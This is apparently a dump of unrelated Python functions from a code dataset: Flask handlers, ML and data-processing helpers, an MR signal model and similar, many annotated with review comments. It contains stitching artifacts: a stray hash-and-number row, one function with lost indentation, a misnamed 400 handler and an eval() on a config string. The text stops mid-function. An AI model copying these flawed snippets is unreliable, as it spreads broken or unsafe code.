def resource_not_found(error):
    """
    Error handling for bad request
    """
    body = {
        "success": False,
        "error": 400,
        "message": "bad request",
    }
    return jsonify(body), 400
def _get_indent(line):
"""Return the indentation in front of a line"""
indent = line.replace(line.lstrip(), '')
return indent | 6a5dd97d4c5702a55b8b1ddaad91c5ecb99458fa | 3,628,451 |
def predict_test(this_model, this_true_data, this_y_scaler, target_var, environment):
    """
    Using selected best model for this horizon, generates prediction (which is then inversed transform)
    Is called in a loop of features which exceed the minimum correlation coefficient
    Parameters
    ----------
    this_model : list
        List containing name and fitted object of best model
    this_true_data : dataframe
        Test dataset, with selected columns only
    this_y_scaler : scaler object
        Scaler of target variable
    target_var : string
        Target variable
    environment : string
        If we are in "QAS", we will have actual values, and will therefore return descaled values of actuals
        If we are in "PRD", returns None for actuals
    Returns
    -------
    y_test_actual
        Scaled actual value. None if we are in "PRD" ie this is production environment and truth is not known
    y_test_actual_descaled
        Descaled actual value. None if we are in "PRD" ie this is production environment and truth is not known
    predictions
        Scaled predicted value.
    y_pred
        Descaled predicted value.
    this_model_name
        Returns name of model used for prediction
    """
    # this_model is a (name, fitted_estimator) pair.
    this_model_name = this_model[0]
    this_regressor = this_model[1]
    # Features are all columns except the target.
    x_cols = [x for x in this_true_data.columns.tolist() if x != target_var]
    X_test = this_true_data[x_cols]
    # NOTE(review): if environment is neither "PRD" nor "QAS",
    # y_test_actual is never assigned and the return raises NameError.
    if environment == "PRD":
        y_test_actual = None
        y_test_actual_descaled = None
    elif environment == "QAS":
        y_test_actual = this_true_data[target_var].values.reshape(-1,1)[0]
        # descale target
        descaled_test_actual_target = inverse_scale_target(this_y_scaler,y_test_actual.reshape(-1, 1),target_var)
        descaled_test_actual_target = descaled_test_actual_target.values.reshape(-1,1)
        y_test_actual_descaled = descaled_test_actual_target[0]
    # get prediction (scaled space), then invert the scaling for reporting
    reg = this_regressor
    predictions = reg.predict(X_test.values)
    predictions = predictions.reshape(-1,1)[0]
    descaled_test_predicted_target = inverse_scale_target(this_y_scaler,predictions.reshape(-1, 1),target_var)
    descaled_test_predicted_target = descaled_test_predicted_target.values.reshape(-1,1)
    y_pred = descaled_test_predicted_target[0]
    return y_test_actual, y_test_actual_descaled, predictions, y_pred, this_model_name
import math
from typing import Tuple


def aline(x: int, y: int, length: int, col: int, angle: int = 0) -> Tuple[int, int]:
    """
    Draws a angled line. Because lazy math
    :param x: start X position
    :param y: start Y position
    :param length: length of the line in pixels
    :param col: colour as integer, see pyxel for that
    :param angle: angle of the line in degree. Use 0 for a horizontal line towards right
    :return: (x2, y2) end point of the drawn line
    :example:
        aline(50, 50, 20, pyxel.COLOR_WHITE, 90)
    """
    # BUG FIX: the return annotation was `[int, int]` (a list literal);
    # a two-int tuple is what is actually returned.
    # Convert degrees to radians once and reuse for both trig calls.
    rad = angle * math.pi / 180
    x2 = int(x + length * math.cos(rad))
    y2 = int(y + length * math.sin(rad))
    pyxel.line(x, y, x2, y2, col)
    return x2, y2
import logging
def ps_(project):
    """
    containers status

    Returns one status dict per container of *project* (stopped included).
    """
    logging.info('ps ' + project.name)
    items = []
    for container in project.containers(stopped=True):
        raw_container = get_container_from_id(project.client, container.id)
        items.append({
            'name': container.name,
            'name_without_project': container.name_without_project,
            'command': container.human_readable_command,
            'state': container.human_readable_state,
            'labels': container.labels,
            'ports': container.ports,
            'volumes': get_volumes(raw_container),
            'is_running': container.is_running,
        })
    return items
def _GetRegionalSetRequest(client, health_check_ref, replacement):
    """Returns a request for updating the health check."""
    update_request = client.messages.ComputeRegionHealthChecksUpdateRequest(
        healthCheck=health_check_ref.Name(),
        healthCheckResource=replacement,
        project=health_check_ref.project,
        region=health_check_ref.region)
    # (service, verb, request) triple consumed by the compute API client.
    return (client.apitools_client.regionHealthChecks, 'Update',
            update_request)
def select_conf(query_message):
    """
    Have the user select from a list of all domains with enabled vhost files.
    Args:
        query_message - The message to display to the user in the prompt
    Returns:
        The configuration file the user picked.
    """
    choices = enabled_sites()
    prompt = inquirer.List('f', message=query_message, choices=choices)
    answers = inquirer.prompt([prompt])
    return answers['f']
def load_8_color_sim(measurements, time, thresholds, remove_edges=True, data=False, start_n = 13, end_n = 46, ignore=[22]):
    """Load 8-color data derived from simulated multi-exposure measurements.

    Runs load_ME_sim over every frame (horizontal direction, center only)
    and feeds the resulting dict into load_8_color.

    Args:
        measurements: Per-frame measurement collection; its length fixes the
            number of frames.
        time: Forwarded to load_ME_sim.
        thresholds: Forwarded to load_ME_sim.
        remove_edges: Forwarded to load_8_color (load_ME_sim is always called
            with remove_edges=False).
        data: Forwarded to load_8_color.
        start_n / end_n / ignore: Selection arguments forwarded to
            load_8_color.  NOTE(review): ``ignore=[22]`` is a mutable default
            argument — safe only as long as callers never mutate it.

    Returns:
        Whatever load_8_color returns (k_hat data).
    """
    num_frames = len(measurements)
    data_dict = load_ME_sim(measurements, time, thresholds, center_only=True, remove_edges=False, direction='horizontal')
    k_hat_data = load_8_color(data_dict, frames=range(num_frames), remove_edges=remove_edges, data=data,
                              start_n=start_n, end_n=end_n, ignore=ignore)
    return k_hat_data
def service_delete_route(service_id):
    """Delete a service (POST with valid form) and redirect to its host view;
    otherwise render the delete-confirmation form."""
    form = ButtonForm()
    if form.validate_on_submit():
        service = Service.query.get(service_id)
        # NOTE(review): query.get() returns None for an unknown id, which
        # would make delete() raise — consider query.get_or_404().
        db.session.delete(service)
        db.session.commit()
        # `service` is still usable after delete() until the session expires it.
        return redirect(url_for('storage.host_view_route', host_id=service.host_id))
    return render_template('button-delete.html', form=form)
def setVariable(name, value):
    """
    Assign a variable in scope. name = value
    :type name: string
    :param name: name of variable to set
    :type value: varies
    :param value: value to set. May be a basic type (string, int) or an object
    """
    scope = CONTEXT.scope
    return scope.setValue(name, value)
def HighFlowSingleInletGadoxetate2DSPGR_Rat(xData2DArray, Ve, Kbh, Khe,
                                            constantsString):
    """This function contains the algorithm for calculating
    how MR signal from a 2D scan varies with time using the
    High Flow Single Inlet Two Compartment Gadoxetate Model model.
    Input Parameters
    ----------------
        xData2DArray - time and AIF concentration 1D arrays
            stacked into one 2D array.
        Ve - Plasma Volume Fraction (decimal fraction).
        Khe - Hepatocyte Uptake Rate (mL/min/mL)
        Kbh - Biliary Efflux Rate (mL/min/mL)
        constantsString - String representation of a dictionary
            of constant name:value pairs used to convert concentrations
            predicted by this model to MR signal values.
    Returns
    -------
    St_rel - list of calculated MR signals at each of the
        time points in array 'time'.
    """
    try:
        exceptionHandler.modelFunctionInfoLogger()
        # Column 0: time points; column 1: arterial (AIF) signal.
        t = xData2DArray[:,0]
        Sa = xData2DArray[:,1]
        # Unpack SPGR model constants from
        # a string representation of a dictionary
        # of constants and their values
        # NOTE(review): eval() assumes constantsString comes from a trusted
        # source — consider ast.literal_eval.
        constantsDict = eval(constantsString)
        TR, baseline, FA, r1, R10a, R10t = \
            float(constantsDict['TR']), \
            int(constantsDict['baseline']),\
            float(constantsDict['FA']), float(constantsDict['r1']), \
            float(constantsDict['R10a']), float(constantsDict['R10t'])
        # Convert to concentrations
        # n_jobs set to 1 to turn off parallel processing
        # because parallel processing caused a segmentation
        # fault in the compiled version of this application.
        # This is not a problem in the uncompiled script
        # Solve the SPGR signal equation for R1a at every time point.
        R1a = [Parallel(n_jobs=1)(delayed(fsolve)
                                  (tools.spgr2d_func, x0=0,
                                   args = (r1, FA, TR, R10a, baseline, Sa[p]))
                                  for p in np.arange(0,len(t)))]
        R1a = np.squeeze(R1a)
        # Relaxation-rate change divided by relaxivity gives concentration.
        ca = (R1a - R10a)/r1
        # Correct for spleen Ve
        ve_spleen = 0.43
        ce = ca/ve_spleen
        if Kbh != 0:
            # Hepatocyte residence time; convolve ce with its exponential decay.
            Th = (1-Ve)/Kbh
            ct = Ve*ce + Khe*Th*tools.expconv(Th,t,ce, 'HighFlowSingleInletGadoxetate2DSPGR_Rat')
        else:
            # Kbh == 0: no efflux, uptake accumulates as a plain integral.
            ct = Ve*ce + Khe*tools.integrate(ce,t)
        # Convert to signal
        St_rel = tools.spgr2d_func_inv(r1, FA, TR, R10t, ct)
        #Return tissue signal relative to the baseline St/St_baseline
        return(St_rel)
    except ZeroDivisionError as zde:
        exceptionHandler.handleDivByZeroException(zde)
    except Exception as e:
        exceptionHandler.handleGeneralException(e)
def to_nltk_tokens(
    df,
    sentence_cols=["sentence1", "sentence2"],
    token_cols=["sentence1_tokens", "sentence2_tokens"],
):
    """
    This function converts a sentence to word tokens using nltk.
    Args:
        df (pd.DataFrame): Dataframe with columns sentence_cols to tokenize.
        sentence_cols (list, optional): Column names for the raw sentences.
        token_cols (list, optional): Column names for the tokenized sentences.
    Returns:
        pd.DataFrame: Dataframe with new columns token_cols, each containing a
            list of tokens for their respective sentences.
    """
    tokenized_part = df[sentence_cols].applymap(nltk.word_tokenize)
    tokenized_part.columns = token_cols
    return pd.concat([df, tokenized_part], axis=1)
def problems(mod, msg):
    """Ansible module exit with an error: report failure via exit_json."""
    failure = dict(changed=False, failed=True, msg=msg)
    return mod.exit_json(**failure)
def to_sql_name(name):
    """
    Ensure ``name`` is a valid SQL name.

    Lower-cases the string and turns every space into an underscore.
    """
    return "_".join(name.lower().split(" "))
import os
import json
def get_setting(key):
    """Return the value stored under *key* in the config.json that sits
    next to this module.

    Args:
        key: Name of the configuration entry to fetch.

    Returns:
        The configured value.

    Raises:
        KeyError: If *key* is missing from config.json.
        Exception: For any other failure (missing/unreadable file, bad JSON).
    """
    try:
        base_dir = str(os.path.dirname(os.path.abspath(__file__)))
        print("BASE DIR: " + base_dir)
        # BUG FIX: the original did `base_dir.join("/config.json")`, which is
        # str.join — it interleaves base_dir between every character of
        # "/config.json" instead of building a file path.
        config_path = os.path.join(base_dir, "config.json")
        with open(config_path) as f:
            config_json = json.load(f)
        return config_json[key]
    except KeyError:
        error_msg = "Set the {0} environment variable".format(key)
        raise KeyError(error_msg)
    except Exception as e:
        raise Exception("Some error occurred: ", e)
def natural_breaks(values, k=5, init=10):
    """
    natural breaks helper function
    Jenks natural breaks is kmeans in one dimension
    Parameters
    ----------
    values : array
             (n, 1) values to bin
    k : int
        Number of classes
    init: int, default:10
        Number of different solutions to obtain using different centroids. Best solution is returned.

    Returns
    -------
    tuple
        (sids, class_ids, fit, cuts): centroids, per-value class labels,
        the fit statistic, and the class cut values from the best k-means run.
    """
    values = np.array(values)
    uv = np.unique(values)
    uvk = len(uv)
    # Fewer unique values than classes: shrink k so every class is non-empty.
    if uvk < k:
        Warn(
            "Warning: Not enough unique values in array to form k classes", UserWarning
        )
        Warn("Warning: setting k to %d" % uvk, UserWarning)
        k = uvk
    kres = _kmeans(values, k, n_init=init)
    sids = kres[-1]  # centroids
    fit = kres[-2]
    class_ids = kres[0]
    cuts = kres[1]
    return (sids, class_ids, fit, cuts)
def _get_base_code_module(builder_name: tfds.core.naming.DatasetName) -> str:
    """Find the code location of the requested dataset."""
    builder_name = str(builder_name)
    datasets_dir = utils.sunds_dir() / 'datasets'
    # Guard clause: fail fast when no dataset directory exists.
    if not (datasets_dir / builder_name).exists():
        raise ValueError(f'Could not find dataset code for {builder_name}')
    return f'sunds.datasets.{builder_name}'
def polygon_to_points( poly ):
    """
    Plotting helper, which rearranges polygon vertices into lists
    of X and Y coordinates. The first point is duplicated at the end
    of each list, to make a closed path.
    :Parameters:
    poly: tuple of ((x1,y1),(x2,y2),...)
        The coordinates of the vertices of the polygon.
    :Returns:
    (xlist, ylist): list of 2 tuples
        ((x1, x2, ..., x1), (y1, y2, ..., y1))
    """
    xs = [vertex[0] for vertex in poly]
    ys = [vertex[1] for vertex in poly]
    # Close the path by repeating the first vertex.
    xs.append(xs[0])
    ys.append(ys[0])
    return (xs, ys)
def make_headers(worksheet):
    """
    Make headers from worksheet

    Maps column index -> slugified header text for text cells in row 0,
    skipping headers that start with an underscore.
    """
    headers = {}
    for col in range(worksheet.ncols):
        # cell_type 1 is presumably the xlrd text-cell code — confirm.
        if worksheet.cell_type(0, col) == 1:
            label = slughifi(worksheet.cell_value(0, col))
            if not label.startswith("_"):
                headers[col] = label
    return headers
import re
def alphanumerical(string):
    """
    A function to filter a string to only allow alphanumerical characters.
    """
    return re.sub(r'[^a-zA-Z0-9]+', '', string)
from typing import Tuple
def _avgpool2d_im2col_reduce(
    x: AbstractTensor,
    pool_size: Tuple[int, int],
    strides: Tuple[int, int],
    padding: str,
) -> AbstractTensor:
    """Perform 2D average pooling by the im2col method.

    Input layout is NCHW. NOTE(review): the window values are combined with
    reduce_sum, not a mean — presumably the division by the window size
    happens elsewhere (or inside reduce_sum); confirm.
    """
    batch, channels, height, width = x.shape
    pool_height, pool_width = pool_size
    # Output spatial size follows the usual SAME/VALID conventions.
    if padding == "SAME":
        out_height = ceil(int(height) / strides[0])
        out_width = ceil(int(width) / strides[1])
    else:
        out_height = ceil((int(height) - pool_size[0] + 1) / strides[0])
        out_width = ceil((int(width) - pool_size[1] + 1) / strides[1])
    # Fold channels into the batch dimension so im2col treats each
    # (sample, channel) plane independently.
    x_split = x.reshape((batch * channels, 1, height, width))
    # NOTE(review): im2col receives only strides[0]; assumes square strides.
    x_cols = x_split.im2col(pool_height, pool_width, padding, strides[0])
    x_cols_sum = x_cols.reduce_sum(axis=0)
    # Restore NCHW ordering.
    out = x_cols_sum.reshape([out_height, out_width, batch, channels]).transpose(
        [2, 3, 0, 1],
    )
    return out
def helper_parse_UniProt_dump_other_functions(list_of_string):
    """Parse UniProt cross-reference ("DR") lines into per-resource ID lists.

    Each input string looks like "GO; GO:0046782; P:regulation ...". Only the
    GO, InterPro, Pfam and Reactome resources are collected; everything else
    is ignored. Reactome IDs lose their "R-" prefix
    (e.g. "R-DME-6799198" -> "DME-6799198").

    Args:
        list_of_string: Iterable of raw cross-reference strings.

    Returns:
        Tuple of four lists: (GO, InterPro, Pfam, Reactome) identifiers.
    """
    buckets = {"GO": [], "InterPro": [], "Pfam": [], "Reactome": []}
    for row in list_of_string:
        fields = row.split(";")
        resource = fields[0]
        try:
            entry = fields[1].strip()
        except IndexError:
            # Malformed line without a second field: skip it.
            continue
        if resource == "Reactome" and entry.startswith("R-"):
            entry = entry[2:]
        bucket = buckets.get(resource)
        if bucket is not None:
            bucket.append(entry)
    return buckets["GO"], buckets["InterPro"], buckets["Pfam"], buckets["Reactome"]
import numpy
def normalise_signal_minmax(signal: numpy.ndarray) -> numpy.ndarray:
    """Linearly rescale *signal* so its minimum maps to -1 and its maximum to 1."""
    lo, hi = signal.min(), signal.max()
    return numpy.interp(signal, (lo, hi), (-1, 1))
import json
import logging
def main(request):
    """HTTP Cloud Function.
    Args:
        request (flask.Request): The request object; its form field "text"
            may contain "<group_name>" or "<group_name> <event_id>".
    Returns:
        The response text, or any set of values that can be turned into a
        Response object using `make_response`
        <http://flask.pocoo.org/docs/0.12/api/#flask.Flask.make_response>.
    """
    group_name = ""
    event_id = ""
    # Retrieve creds
    # Slack credentials live in a JSON blob on GCS, not in env vars.
    client = storage.Client()
    bucket = client.get_bucket('gcpug-meetup-files')
    blob = bucket.get_blob('config/config.json')
    keys = blob.download_as_string()
    keys_json = json.loads(keys)
    # Retrieve slack channel id
    slack_token = keys_json['slack_token']
    slack_channel_name = keys_json['slack_channel_name']
    channel_id = slack.get_channel_list(slack_token, slack_channel_name)
    text_value = request.form.get('text')
    logging.info("Text_Value: %s" % (text_value))
    try:
        if text_value is None or text_value == "":
            logging.info("No Group name passed in")
        else:
            split_text = text_value.split(" ")
            if len(split_text) == 1:
                # Only a group name given: look up its next upcoming event.
                group_name = split_text[0]
                event_id = meetup.get_latest_upcoming_event(group_name)
            else:
                group_name = split_text[0]
                event_id = split_text[1]
    except ValueError as e:
        logging.error(e)
        slack.send_text_to_channel(
            slack_token, channel_id, "Group name is unavailable. Please check again")
        return "error"
    except Exception as e:
        logging.error(e)
        slack.send_text_to_channel(
            slack_token, channel_id, "Error in retrieving stats. Check logs")
        return "error"
    # TODO: Move default channel to a config file
    if group_name == "":
        group_name = "GCPUGSG"
    if event_id == "":
        event_id = "251921227"
    # get_rsvps presumably writes the chart to /tmp/test.png — confirm.
    meetup.get_rsvps(group_name, event_id)
    slack.upload_image_to_channel(slack_token, channel_id,
                                  "/tmp/test.png")
    return 'test v5!'
from typing import List
from typing import Tuple
import statistics
def znormalizeSpeakerData(
    featureTimeList: List[Tuple[float, ...]], index: int, filterZeroValues: bool
) -> List[Tuple[float, ...]]:
    """
    znormalize time series data
    The idea is to normalize each speaker separately to be able
    to compare data across several speakers for speaker-dependent
    data like pitch range
    To normalize a speakers data within a local window, use filterTimeSeriesData()
    filterZeroValues: if True, don't consider zero values in the mean and stdDev
                      (recommended value for data like pitch or intensity)
    """
    featValues = [row[index] for row in featureTimeList]
    if not filterZeroValues:
        featValues = znormalizeData(featValues)
    else:
        # NOTE(review): empty-string entries (not zeroes) are what gets
        # filtered here; values <= 0 are mapped to 0 below.
        featValuesNoZeroes = [val for val in featValues if val != ""]
        meanVal = statistics.mean(featValuesNoZeroes)
        stdDevVal = statistics.stdev(featValuesNoZeroes)
        featValues = [
            (val - meanVal) / stdDevVal if val > 0 else 0 for val in featValues
        ]
    if len(featureTimeList) != len(featValues):
        # BUG FIX: the original built this error but never raised it, and the
        # message string was missing its f-prefix, so the placeholders were
        # emitted literally.
        raise errors.ArgumentError(
            f"The length of the time values {len(featureTimeList)} does not "
            f"match the length of the data values {len(featValues)}"
        )
    # Rebuild each row with the normalized value spliced back in at *index*.
    outputList = [
        tuple([*piRow[:index], val, *piRow[index + 1 :]])
        for piRow, val in zip(featureTimeList, featValues)
    ]
    return outputList
import os
def parallel():
    """
    Returns 'mpi', if this code runs with MPI, else returns 'seq'
    :return:
    """
    # Open MPI exports OMPI_COMM_WORLD_SIZE when launched via mpirun.
    if 'OMPI_COMM_WORLD_SIZE' in os.environ:
        return 'mpi'
    return 'seq'
def only_float(val):
    """Pass input val value or array only if it is a float.
    :param val: value to be evaluated
    :returns: evaluated value
    :rtype: np.float64 or np.ndarray (np.nan for non-float scalars)
    """
    if isinstance(val, (np.float64, float)):
        return val
    # Strings and non-iterables are not arrays of floats -> NaN.
    if isinstance(val, str) or not hasattr(val, "__iter__"):
        return np.nan
    cleaned = [
        item if isinstance(item, (np.float64, float)) else np.nan
        for item in val
    ]
    return np.asarray(cleaned)
def dcos_ca_bundle():
    """
    Retrieve DC/OS CA bundle and returns the content.
    """
    raw_bundle = transport_encryption.fetch_dcos_ca_bundle_contents()
    return raw_bundle.decode("ascii")
def slr_range_bias(dset):
    """Calculate the partial derivative of the measurement with respect to range bias.

    Args:
        dset: A Dataset containing model data.

    Returns:
        Tuple: Array of partial derivatives, list of derivative names, and
        the unit string.
    """
    all_stations = np.asarray(dset.unique("station"))
    # Keep only stations that are flagged for estimation and actually
    # carry observations.
    flagged = dset.station[np.asarray(dset.estimate_range, dtype=bool)]
    keep = np.in1d(all_stations, flagged)
    stations = all_stations[keep]
    # The partial w.r.t. a station's range bias is 1 for observations
    # involving that station and 0 otherwise.
    partials = np.zeros((dset.num_obs, len(stations)))
    for col, name in enumerate(stations):
        partials[dset.filter(station=name), col] = 1
    column_names = [s for s in stations]
    return partials, column_names, "dimensionless"
def calc_cond_hf(data: h5py.File, direction: str='full'):
    """Calculate the conductive heat flow q = -λ·∇T over the model cube.

    Args:
        data (h5py.File): HDF5 file with simulated variables (temp, cell
            sizes delx/dely/delz and conductivities lx/ly/lz).
        direction (str, optional): 'full' returns (qx, qy, qz); 'x', 'y' or
            'z' returns just that component. Defaults to 'full'.

    Returns:
        np.ndarray or tuple of three arrays with the requested heat flow.
    """
    dx = data['delx'][:, :, :]
    dy = data['dely'][:, :, :]
    dz = data['delz'][:, :, :]
    # np.gradient returns derivatives per axis: axis0 -> z, axis1 -> y, axis2 -> x.
    grad_z, grad_y, grad_x = np.gradient(data['temp'][:, :, :])
    qx = -data['lx'][:, :, :] * (grad_x / dx)
    qy = -data['ly'][:, :, :] * (grad_y / dy)
    qz = -data['lz'][:, :, :] * (grad_z / dz)
    if direction == 'full':
        return qx, qy, qz
    # Unknown direction falls through to None, matching the original behavior.
    return {'x': qx, 'y': qy, 'z': qz}.get(direction)
def decode_dbkey(dbkey):
    """Decode *dbkey* and return the tuple (username, dbkey).

    A shared key has the form "username:dbkey"; a plain key has no owner,
    so (None, dbkey) is returned.
    """
    if isinstance(dbkey, str) and ':' in dbkey:
        # BUG FIX: split only on the first colon so keys whose value itself
        # contains ':' still decode to exactly two parts, and return a tuple
        # as documented (the unbounded split returned a list of >= 2 items).
        username, _, key = dbkey.partition(':')
        return username, key
    else:
        return None, dbkey
def get_case_related_entities(st, related_cases):
    """Returns the all the entities featured in the related cases without duplicates.
    INPUT: Storage unit, related cases.
    OUTPUT: All the entities and their types contained in the related cases without duplicates"""
    existing_ners = {}
    for c in related_cases:
        case_ents = st.get_case_entities(c)
        # Flatten the per-type entity dicts into one mapping for this case.
        ents = {}
        for k, v in case_ents.items():
            ents.update(v)
        # NOTE(review): a case is merged only when NONE of its entity keys
        # overlap with what was already collected — a single shared key
        # drops the case's entire entity set. Confirm this all-or-nothing
        # behavior is intended for "without duplicates".
        if not set(existing_ners) & set(ents):
            for k, e in ents.items():
                existing_ners[k] = e
    return existing_ners
def create_view(request):
    """ Takes a http request and renders a page for creating a Hub.

    POST: validates the form, rejects names already used by this seller
    (re-rendering an empty form), otherwise creates the Hub and redirects
    to the hub list. GET: renders an empty creation form.
    """
    if(request.method == 'POST'):
        form = HubCreateForm(request.POST)
        # Check if the form is valid:
        if form.is_valid():
            # Hub names are namespaced per seller as "<username>/<name>".
            queryset_hub = Hub.objects.filter(seller_name=request.user.username)
            for h in queryset_hub:
                if h.name == request.user.username + '/' + form.cleaned_data['name']:
                    # Duplicate name: show a fresh form.
                    # NOTE(review): no error message is attached, so the user
                    # gets no feedback about why the form was reset.
                    form = HubCreateForm()
                    context = {
                        'form' : form,
                    }
                    return render(request, 'hubs/hub_create.html', context)
            ''' create a hub instance, add username and save to database '''
            instance = Hub()
            instance.seller_name = request.user.username
            instance.name = request.user.username + '/' + form.cleaned_data['name']
            instance.private = form.cleaned_data['private']
            instance.save()
            return HttpResponseRedirect(reverse('hubs:list') )
    # GET (or invalid POST — NOTE(review): validation errors are discarded
    # because a brand-new form is rendered here).
    form = HubCreateForm()
    context = {
        'form' : form,
    }
    return render(request, 'hubs/hub_create.html', context)
async def async_setup(hass, config):
    """Start the Fortigate component."""
    domain_conf = config[DOMAIN]
    # Delegate the actual setup; propagate its success flag.
    return await async_setup_fortigate(
        hass,
        config,
        domain_conf[CONF_HOST],
        domain_conf[CONF_USERNAME],
        domain_conf[CONF_API_KEY],
        domain_conf[CONF_DEVICES],
    )
import random
def get_documents_words(news_files, corpus_news):
    """
    Given a set of documents it will return the dictionary with their
    respective categories
    :param news_files: List of raw news file names
    :param corpus_news: PlainTextCorpusReader object
    :return: Shuffled list of (words, category) pairs
    """
    root = corpus_news.root
    labeled_docs = []
    for path in news_files:
        # The category is encoded in the file name as "<category>--...".
        category = path.split('/')[-1].split('--')[0]
        relative_name = path.replace(root, '', 1)
        words = corpus_news.words(relative_name[1:])
        labeled_docs.append((list(words), category))
    random.shuffle(labeled_docs)
    return labeled_docs
def process(ele):
    """reshape 'dtce' and 0-1 normalizes it"""
    dtce = tf.reshape(ele['dtce'], [ele['height'], ele['width']])
    lo = tf.reduce_min(dtce)
    hi = tf.reduce_max(dtce)
    ele['dtce'] = (dtce - lo) / (hi - lo)
    return ele
def get_CIFAR10_data(cifar10_dir, num_training=49000, num_validation=1000, num_test=1000,
                     subtract_mean=True):
    """
    Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
    it for classifiers.
    """
    # Load the raw CIFAR-10 data
    X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
    # Carve the validation split out of the tail of the training data.
    val_idx = list(range(num_training, num_training + num_validation))
    X_val, y_val = X_train[val_idx], y_train[val_idx]
    train_idx = list(range(num_training))
    X_train, y_train = X_train[train_idx], y_train[train_idx]
    test_idx = list(range(num_test))
    X_test, y_test = X_test[test_idx], y_test[test_idx]
    # Zero-center every split using the training-set mean image.
    if subtract_mean:
        mean_image = np.mean(X_train, axis=0)
        X_train -= mean_image
        X_val -= mean_image
        X_test -= mean_image
    # Package data into a dictionary
    return {
        'X_train': X_train, 'y_train': y_train,
        'X_val': X_val, 'y_val': y_val,
        'X_test': X_test, 'y_test': y_test,
    }
import os
import traceback
import sys
def getEmoji(aCountry):
    """
    Get country emoji

    Looks up *aCountry* in Config.dCountryCodes and converts its code to a
    flag emoji. Returns "" for unknown countries and None when flagize
    raises. NOTE(review): the ""-vs-None split forces callers to handle two
    different "no emoji" values — confirm that is intended.
    """
    bEmoji = ""
    try:
        if aCountry in Config.dCountryCodes:
            bEmoji = flag.flagize(":%s:" % (Config.dCountryCodes[aCountry]))
    except Exception:
        # Log the failing file/module/line extracted from the traceback.
        myLogger.exception(
            "Exception in [file: %s | module: %s | line: %s]: %s",
            os.path.basename(traceback.extract_stack()[-1][0]),
            traceback.extract_stack()[-1][2],
            traceback.extract_stack()[-1][1],
            sys.exc_info()[1],
        )
        return None
    return bEmoji
def response_for_created_event(event, status_code):
    """
    Method returning the response when an event has been successfully created.
    :param status_code:
    :param event: Event
    :return: Http Response
    """
    payload = {
        'event': {
            'event_id': event.event_id,
            'event_name': event.event_name,
            'event_location': event.event_location,
            'event_eval_link': event.event_eval_link,
            'event_time': event.event_time,
            'created_on': event.event_created_on,
            'modified_on': event.event_updated_on,
        },
        'status': 'success',
    }
    return make_response(jsonify(payload)), status_code
import time
import numpy
def weightedLeastSquares(X, Y, W):
    """Solve the weighted normal equations beta = (X^T W X)^-1 X^T W Y.

    Args:
        X: Design matrix.
        Y: Observation vector/matrix.
        W: Weights, applied element-wise to X^T (as in the original code).

    Returns:
        The coefficient estimate, or None when the inputs have incompatible
        sizes or X^T W X is singular.
    """
    ### check the input
    if checkMatrixSizes(X, Y) is False:
        return None
    ### solve using the normal equations with no manipulation
    XTW = numpy.transpose(X)*W
    XTWX = numpy.dot(XTW, X)
    # A zero determinant means the normal matrix cannot be inverted.
    if numpy.linalg.det(XTWX) == 0:
        apDisplay.printWarning("Singular matrix in calculation")
        return None
    XTWXinv = numpy.linalg.inv(XTWX)
    beta = numpy.dot(numpy.dot(XTWXinv, XTW), Y)
    return beta
def question_first_sentence(database_connection, question):
    """
    Return the raw text of the first row stored for the given question id,
    or None when the question has no text rows.
    """
    c = database_connection.cursor()
    # %i accepts only integers, so this interpolation cannot inject SQL
    # through the question parameter.
    command = 'select raw from text where question=%i' % question
    c.execute(command)
    # Return the first row only; the cursor yields 1-tuples.
    for ii, in c:
        return ii
def help_search():
    """Search help guide."""
    locale = get_locale()
    # First template that exists wins; English is the fallback when no
    # locale-specific page is available.
    candidates = [
        f"invenio_app_rdm/help/search.{locale}.html",
        "invenio_app_rdm/help/search.en.html",
    ]
    return render_template(candidates)
def sum_of_vals(vals):
    """Return the sum of the values in *vals*.

    :param vals: an iterable such as list
    :return: sum of the values from the iterable (0 for an empty iterable)
    """
    # The built-in replaces the manual accumulator loop, which also
    # shadowed the built-in name `sum`.
    return sum(vals)
from typing import List
def predict_all_attrs(
    img: tf.Tensor, model_list: List[tf.keras.Model]) -> List[np.int32]:
  """Predicts all attributes for a given image."""
  # Every model except the last is a classifier: take its argmax.
  predictions = [np.argmax(model(img)) for model in model_list[:-1]]
  # The final model is a regressor; 7*x + 7 presumably maps its output
  # back to the attribute's value range — confirm.
  predictions.append(np.round(7. * model_list[-1](img) + 7)[0][0])
  return predictions
import re
def recognize_timestamp(line):
    """Return True when *line* matches the module-level ``timestamp_pattern``.

    The original declared ``global timestamp_pattern``, which is unnecessary
    for read-only access, and spelled the boolean out with an if/else.
    """
    return re.match(timestamp_pattern, line) is not None
def admin_email_address_has_approved_domain(email_address):
    """
    Check the admin's email address is from a whitelisted domain
    :param email_address: string
    :return: boolean
    """
    domain = email_address.split('@')[-1]
    approved = current_app.config.get('DM_ALLOWED_ADMIN_DOMAINS', [])
    return domain in approved
def get_replica_context() -> ReplicaContext:
    """If called from a deployment, returns the deployment and replica tag.
    A replica tag uniquely identifies a single replica for a Ray Serve
    deployment at runtime. Replica tags are of the form
    `<deployment_name>#<random letters>`.
    Raises:
        RayServeException: if not called from within a Ray Serve deployment.
    Example:
        >>> from ray import serve
        >>> # deployment_name
        >>> serve.get_replica_context().deployment # doctest: +SKIP
        >>> # deployment_name#krcwoa
        >>> serve.get_replica_context().replica_tag # doctest: +SKIP
    """
    context = get_internal_replica_context()
    if context is not None:
        return context
    raise RayServeException(
        "`serve.get_replica_context()` "
        "may only be called from within a "
        "Ray Serve deployment."
    )
def stratify(data, classes, ratios, one_hot=False):
    """Stratifying procedure. Borrowed from https://vict0rs.ch/2018/05/24/sample-multilabel-dataset/
    data is a list of lists: a list of labels, for each sample.
        Each sample's labels should be ints, if they are one-hot encoded, use one_hot=True
    classes is the list of classes each label can take
    ratios is a list, summing to 1, of how the dataset should be split

    Returns:
        (stratified_data_ids, stratified_data): per-subset sorted sample
        indices into *data*, and the corresponding label lists.
    """
    # one-hot decoding
    if one_hot:
        temp = [[] for _ in range(len(data))]
        indexes, values = np.where(np.array(data).astype(int) == 1)
        for k, v in zip(indexes, values):
            temp[k].append(v)
        data = temp
    # Organize data per label: for each label l, per_label_data[l] contains the list of samples
    # in data which have this label
    per_label_data = {c: set() for c in classes}
    for i, d in enumerate(data):
        for l in d:
            per_label_data[l].add(i)
    # number of samples
    size = len(data)
    # In order not to compute lengths each time, they are tracked here.
    subset_sizes = [r * size for r in ratios]
    target_subset_sizes = deepcopy(subset_sizes)
    per_label_subset_sizes = {
